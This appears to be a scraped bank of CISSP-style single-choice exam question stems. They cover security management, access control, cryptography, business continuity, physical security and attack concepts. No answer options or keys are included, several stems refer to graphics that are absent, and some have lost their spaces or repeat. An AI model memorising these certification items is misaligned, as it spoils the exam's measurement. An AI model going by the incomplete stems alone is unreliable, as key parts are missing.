单选题Which of the following antivirus detection methods is the most recent to the industry and monitors suspicious code as it executes within the operating system?
单选题Sally has found out that software programmers in her company are making changes to software components and uploading them to the main software repository without following version control or documenting their changes. This is causing a lot of confusion and has caused several teams to use the older versions. Which of the following would be the best solution for this situation?
单选题The following scenario is to be used for questions 27, 28, and 29.Mike is the new CSO of a large pharmaceutical company. He has been asked to revamp the company's physical security program and better align it with the company's information security practices. Mike knows that the new physical security program should be made up of controls and processes that support the following categories: deterrent, delaying, detection, assessment, and response.
单选题A number of attacks can be performed against smart cards. Side-channel is a class of attacks that doesn"t try to compromise a flaw or weakness. Which of the following is not a side-channel attack?
单选题John is installing a sprinkler system that makes use of a thermal-fusible link for a data center located in Canada. Which of the following statements is true of the system he's installing?
单选题Operating systems have evolved and changed over the years. The earlier operating systems were monolithic and did not segregate critical processes from noncritical processes. As time went on operating system vendors started to reduce the amount of programming code that ran in kernel mode. Only the absolutely necessary code ran in kernel mode, and the remaining operating system code ran in user mode. This architecture introduced performance issues, which required the operating system vendors to reduce the critical operating system functionality to microkernels and allow the remaining operating system functionality to run in client/server models within kernel mode.
单选题Anaccesscontrolmatrixisusedinmanyoperatingsystemsandapplicationstocontrolaccessbetweensubjectsandobjects.Whatisthecolumninthistypeofmatrixreferredtoas?
单选题Which of the following correctly describes a federated identity and its role within identity management processes?
单选题Whattechnologywithinidentitymanagementisillustratedinthegraphicthatfollows?
单选题Sue has been tasked with implementing a number of security controls, including antivirus and antispam software, to protect the company"s e-mail system, What type of approach is her company taking to handle the risk posed by the system?
单选题There are several categories of evidence. How is a witness's oral testimony categorized?
单选题If Marge uses her private key to create a digital signature on a message she is sending to George, but she does not show or share her private key with George, what is it an example of?
单选题Susan, an attorney, has been hired to fill a new position at Widgets Inc. The position is Chief Privacy Officer (CPO). What is the primary function of her new role?
单选题ACME Inc. paid a software vendor to develop specialized software, and that vendor has gone out of business. ACME Inc. does not have access to the code and therefore cannot keep it updated. What mechanism should the company have implemented to prevent this from happening?
单选题Which of the following is not considered a countermeasure to port scanning and operating system fingerprinting?
单选题There are several types of volumetric IDSs. What type of IDS emits a measurable magnetic field that it monitors for disruptions?
单选题Hanna is a new security manager for a computer consulting company. She has found out that the company has lost intellectual property in the past because malicious employees installed rogue devices on the network, which were used to capture sensitive traffic. Hanna needs to implement a solution that ensures only authorized devices are allowed access to the company network. Which of the following IEEE standards was developed for this type of protection?
单选题Sam plans to establish mobile phone service using the personal information he has stolen from his former boss. What type of identity theft is this?
单选题Which of the following is considered the second generation of programming languages?
单选题Hannah has been assigned the task of installing Web access management (WAM) software. What is the best description for what WAM is commonly used for?
单选题______is a set of extensions to DNS that provides to DNS clients (resolvers) origin authentication of DNS data to reduce the threat of DNS poisoning, spoofing, and similar attack types.
单选题Thereareseveraldifferentmodesthatblockcipherscanworkin.Whichmodedoesthegraphicthatfollowsportray?
单选题Before an effective physical security program can be rolled out, a number of steps must be taken. Which of the following steps comes first in the process of rolling out a security program?
单选题Robert has been given the responsibility of installing doors that provide different types of protection. He has been told to install doors that provide failsafe, fail-secure, and fail-soft protection. Which of the following statements is true about secure door types?
单选题As his company's CISO, George needs to demonstrate to the Board of Directors the necessity of a strong risk management program. Which of the following should George use to calculate the company's residual risk?
单选题Several teams should be involved in carrying out the business continuity plan. Which team is responsible for starting the recovery of the original site?
单选题Which of the following statements does not correctly describe SOAP and Remote Procedure Calls?
单选题David is preparing a server room at a new branch office. What locking mechanisms should he use for the primary and secondary server room entry doors?
单选题There are several types of intrusion detection systems (IDSs). What type of IDS builds a profile of an environment"s normal activities and assigns an anomaly score to packets based on the profile?
单选题Cross-site scripting (XSS) is an application security vulnerability usually found in Web applications. What type of XSS vulnerability occurs when a victim is tricked into opening a URL programmed with a rogue script to steal sensitive information?
单选题Both de facto and proprietary interior protocols are in use today. Which of the following is a proprietary interior protocol that chooses the best path between the source and destination?
单选题The relay agent on a mail server plays a role in spam prevention. Which of the following incorrectly describes mail relays?
单选题Whattechnologywithinidentitymanagementisillustratedinthegraphicthatfollows?
单选题The common law system is broken down into which of the following categories?
单选题Therearemanydifferenttypesofaccesscontrolmechanismsthatarecommonlyembeddedintoalloperatingsystems.Whichofthefollowingisthemechanismthatismissinginthisgraphic?
单选题The integrity of data is not related to which of the following?
单选题Sam is the security manager of a company that makes most of its revenue from its intellectual property. Sam has implemented a process improvement program that has been certified by an outside entity. His company received a Level 2 during an appraisal process, and he is putting in steps to increase this to a Level 3. A year ago when Sam carried out a risk analysis, he determined that the company was at too much of a risk when it came to potentially losing trade secrets. The countermeasure his team implemented reduced this risk, and Sam determined that the annualized loss expectancy of the risk of a trade secret being stolen once in a hundred-year period is now $400.
单选题Which of the following is not an effective countermeasure against spam?
单选题Which of the following best describes how SAML, SOAP, and HTTP commonly work together in an environment that provides Web services?
单选题A change management process should include a number of procedures. Which of the following incorrectly describes a characteristic or component of a change control policy?
单选题The NIST organization has defined best practices for creating continuity plans. Which of the following phases deals with identifying and prioritizing critical functions and systems?
单选题Brian has been asked to work on the virtual directory of his company"s new identity management system. Which of the following best describes a virtual directory?
单选题The Information Technology Infrastructure Library(ITIL) consists of five sets of instructional books. Which of the following is considered the core set and focuses on the overall planning of the intended IT services?
单选题The following scenario will be used to answer questions 30, 31 and 32. Jeff is leading the business continuity group in his company. They have completed a business impact analysis and have determined that if the company's credit card processing functionality was unavailable for 48 hours the company would most likely experience such a large financial hit that it would have to go out of business. The team has calculated that this functionality needs to be up and running within 28 hours after experiencing a disaster for the company to stay in business. The team has also determined that the restoration steps must be able to restore data that are one hour old or less.
单选题Which of the following is not a responsibility of the memory manager?
单选题There are four categories of software licensing. Which of the following refers to software sold at a reduced cost?
单选题WhichtypeofWANtunnelingprotocolismissingfromthetablethatfollows?
单选题Which of the following describes object-oriented programming deferred commitment?
单选题The following scenario will be used for questions 26, 27, and 28.Trent is the new manager of his company's internal software development department. He has been told by his management that the group needs to be compliant with the international standard that provides guidance to organizations in integrating security into the processes used for managing their applications. His new boss told him that he should join and get familiar with the Web Application Security Consortium, and Trent just received an e-mail stating that one of the company's currently deployed applications has a zero day vulnerability.
单选题Certain types of attacks have been made more potent by which of the following advances to microprocessor technology?
单选题Organizations should keep system documentation on hand to ensure that the system is properly cared for, that changes are controlled, and that the organization knows what's on the system. What does not need to be in this type of documentation?
单选题Sally is carrying out a software analysis on her company"s proprietary application. She has found out that it is possible for an attacker to force an authorization step to take place before the authentication step is completed successfully. What type of issue would allow for this type of compromise to take place?
单选题Authorization creep is to access controls what scope creep is to software development. Which of the following is not true of authorization creep?
单选题Differentaccesscontrolmodelsprovidespecifictypesofsecuritymeasuresandfunctionalityinapplicationsandoperatingsystems.Whatmodelisbeingexpressedinthegraphicthatfollows?
单选题It is not unusual for business continuity plans to become out of date. Which of the following is not a reason why plans become outdated?
单选题What type of exploited vulnerability allows more input than the program has allocated space to store it?
单选题With what phase of a business continuity plan does a company proceed when it is ready to move back into its original site or a new site?
单选题Paisley is helping her company identify potential site locations for a new facility. Which of the following is not an important factor when choosing a location?
单选题Which of the following incorrectly describes the concept of executive succession planning?
单选题The following scenario is to be used for questions 30, 31, and 32.Greg is the security facility officer of a financial institution. His boss has told him that visitors need a secondary screening before they are allowed into sensitive areas within the building. Greg has also been told by the network administrators that after the new HVAC system was installed throughout the facility, they have noticed that power voltage to the systems in the data center sags.
单选题Widgets Inc.'s software development processes are documented and the organization is capable of producing its own standard of software processes. Which of the following Capability Maturity Model Integration levels best describes Widgets Inc.?
单选题There are two main functions that Trusted Platform Modules (TPMs) carry out within systems today. Which of the following best describes these two functions?
单选题Thereareseveraldifferenttypesofdatabases.Whichtypedoesthegraphicthatfollowsillustrate?
单选题What discipline combines the physical environment and sociology issues that surround it to reduce crime rates and the fear of crime?
单选题Hereisagraphicofabusinesscontinuitypolicy.Whichcomponentismissingfromthisgraphic?
单选题Thereareseveraldifferenttypesofcentralizedaccesscontrolprotocols.Whichofthefollowingisillustratedinthegraphicthatfollows?
单选题Which of the following is the best description of a component-based system development method?
单选题Cyberlaw categorizes computer-related crime into three categories. Which of the following is an example of a crime in which the use of a computer would be categorized as incidental?
单选题Which of the following refers to the amount of time it will be expected to take to get a device fixed and back into production?
单选题There are several types of password management approaches used by identity management systems. Which of the following reduces help-desk call volume, but is also criticized for the ease with which a hacker could gain access to multiple resources if a password is compromised?
单选题Whattypeoftechnologyisrepresentedinthegraphicthatfollows?
单选题As a CISSP candidate, you must sign a Code of Ethics. Which of the following is from the (ISC)
2
Code of Ethics for the CISSP?
单选题Charlie is a new security manager at a textile company that develops its own proprietary software for internal business processes. Charlie has been told that the new application his team needs to develop must comply with the ISO/IEC 42010 standard. He has found out that many of the critical applications have been developed in the C programming language and has asked for these applications to be reviewed for a specific class of security vulnerabilities.
单选题Preplanned business continuity procedures provide organizations a number of benefits. Which of the following is not a capability enabled by business continuity planning?
单选题The requirement of erasure is the end of the media life cycle if it contains sensitive information. Which of the following best describes purging?
单选题Two commonly used networking protocols are TCP and UPD. Which of the following correctly describes the two?
单选题After a disaster occurs, a damage assessment needs to take place. Which of the following steps occurs last in a damage assessment?
单选题In computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling?
单选题Which of the following does not describe privacy-aware role-based access control?
单选题Whattypeofinfrastructuralsetupisillustratedinthegraphicthatfollows?
单选题There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus?
单选题Whatarethethreetypesofpoliciesthataremissingfromthefollowinggraphic?
单选题The Recovery Time Objective (RTO) and Maximum Tolerable Downtime (MTD) metrics have similar roles, but their values are very different. Which of the following best describes the difference between RTO and MTD metrics?
单选题Angela wants to group together computers by department to make it easier for them to share network resources. Which of the following will allow her to group computers logically?
单选题If implemented properly, a one-time pad is a perfect encryption scheme. Which of the following incorrectly describes a requirement for implementation?
单选题Which of the following is a common association of the Clark-Wilson access model?
单选题There are two main types of symmetric ciphers: stream and block. Which of the following is not an attribute of a good stream cipher?
单选题Thereareseveraldifferenttypesofauthenticationtechnologies.Whichtypeisbeingshowninthegraphicthatfollows?
单选题For what purpose was the COSO framework developed?
单选题High availability (HA) is a combination of technologies and processes that work together to ensure that specific critical functions are always up and running at the necessary level. To provide this level of high availability, a company has to have a long list of technologies and processes that provide redundancy, fault tolerance, and failover capabilities. Which of the following best describes these characteristics?
单选题Thereareseveralsecurityenforcementcomponentsthatarecommonlybuiltintooperatingsystems.Whichcomponentisillustratedinthegraphicthatfollows?
单选题The following scenario will be used for questions 30 and 31.Stephanie has been put in charge of developing incident response and forensics procedures her company needs to carry out if an incident occurs. She needs to ensure that their procedures map to the international principles for gathering and protecting digital evidence. She also needs to ensure that if and when internal forensics teams are deployed, they have labels, tags, evidence bags, cable ties, imaging software, and other associated tools.
单选题An outline for a physical security design should include program categories and the necessary countermeasures for each. What category do locks and access controls belong to?
单选题Amultitaskingoperatingsystemcanhaveseveralprocessesrunningatthesametime.Whatarethecomponentswithintheprocessesthatareshowninthegraphicthatfollows?
单选题RAID systems use a number of techniques to provide redundancy and performance. Which of the following activities divides and writes data over several drives?
单选题Bethany is working on a mandatory access control (MAC) system. She has been working on a file that was classified as Secret. She can no longer access this file because it has been reclassified as Top Secret. She deduces that the project she was working on has just increased in confidentiality and she now knows more about this project than her clearance and need-to-know allows. Which of the following refers to a concept that attempts to prevent this type of scenario from occurring?
单选题Whattypeofriskanalysisapproachdoesthefollowinggraphicprovide?
单选题As with logical access controls, audit logs should be produced and monitored for physical access controls. Which of the following statements is correct about auditing physical access?
单选题What type of fence detects if someone attempts to climb or cut it?
单选题John is responsible for providing a weekly report to his manager outlining the week's security incidents and mitigation steps. What steps should he take if a report has no information?
单选题Whatisthemissingsecondstepinthegraphicthatfollows?
单选题Whattypeoftelecommunicationtechnologyisillustratedinthegraphicthatfollows?
单选题Layer 2 of the OSI model has two sublayers. What are those sublayers, and what are two IEEE standards that describe technologies at that layer?
单选题Whattypeoftechnologyisrepresentedinthegraphicthatfollows?
单选题Thereareseveraldifferenttypesofauthenticationtechnologies.Whichtypeisbeingshowninthegraphicthatfollows?
单选题There are different ways that operating systems can carry out software I/O procedures. Which of the following is used when the CPU sends data to an I/O device and then works on another process's request until the I/O device is ready for more data?
单选题Risk assessment has several different methodologies. Which of the following official risk methodologies was not created for the purpose of analyzing security risks?
单选题Whatarethethreetypesofpoliciesthataremissingfromthefollowinggraphic?
单选题Which of the following occurs in a PK.I environment?
单选题Amultitaskingoperatingsystemcanhaveseveralprocessesrunningatthesametime.Whatarethecomponentswithintheprocessesthatareshowninthegraphicthatfollows?
单选题Whattypeofsecurityencryptioncomponentismissingfromthetablethatfollows?
单选题The operations team is responsible for defining which data gets backed up and how often. Which type of backup process backs up files that have been modified since the last time all data was backed up?
单选题The following scenario will be used for questions 28 and 29.Jack has been told that successful attacks have been taking place and data that have been encrypted by his company's software systems have leaked to the company's competitors. Through Jack's investigation he has discovered that the lack of randomness in the seeding values used by the encryption algorithms in the company's software uncovered patterns and allowed for successful reverse engineering.
单选题Management support is critical to the success of a business continuity plan. Which of the following is the most important to be provided to management to obtain their support?
单选题Whattypeofriskanalysisapproachdoesthefollowinggraphicprovide?
单选题Which of the following indicates to a packet where to go and how to communicate with the right service or protocol on the destination computer?
单选题Which of the following correctly best describes an object-oriented database?
单选题IDSs can detect intruders by employing electromechanical systems or volumetric systems. Which of the following correctly describes these systems?
单选题Tom works at a large retail company that recently deployed radio-frequency identification (RFID) to better manage its inventory processes. Employees use scanners to gather product-related information instead of manually looking up product data. Tom has found out that malicious customers have carried out attacks on the RFID technology to reduce the amount they pay on store items. Which of the following is the most likely reason for the existence of this type of vulnerability?
单选题Jill is establishing a companywide sales program that will require different user groups with different privileges to access information on a centralized database. How should the security manager secure the database?
单选题Which of the following is a legal form of eavesdropping when performed with prior consent or a warrant?
单选题As his company's business continuity coordinator, Matthew is responsible for helping recruit members to the business continuity planning (BCP) committee. Which of the following does not correctly describe this effort?
单选题Differenttypesofmaterialarebuiltintowallsandotherconstructsofvarioustypesofbuildingsandfacilities.Whattypeofmaterialisshowninthefollowingphoto?
单选题Which of the following is a correct description of the pros and cons associated with third-generation programming languages?
单选题Severaldifferenttypesofsmokeandfiredetectorscanbeused.Whattypeofdetectorisshowninthefollowinggraphic?
单选题Guidelines should be followed to allow secure remote administration. Which of the following is not one of those guidelines?
单选题There are different types of approaches to regulations. Which of the following is an example of self-regulation?
单选题Gizmos and Gadgets has restored its original facility after a disaster. What should be moved in first?
单选题Electrical power is being provided more through smart grids, which allow for self-healing, resistance to physical and cyberattacks, increased efficiency, and better integration of renewable energy sources. Countries want their grids to be more reliable, resilient, flexible, and efficient. Why does this type of evolution in power infrastructure concern many security professionals?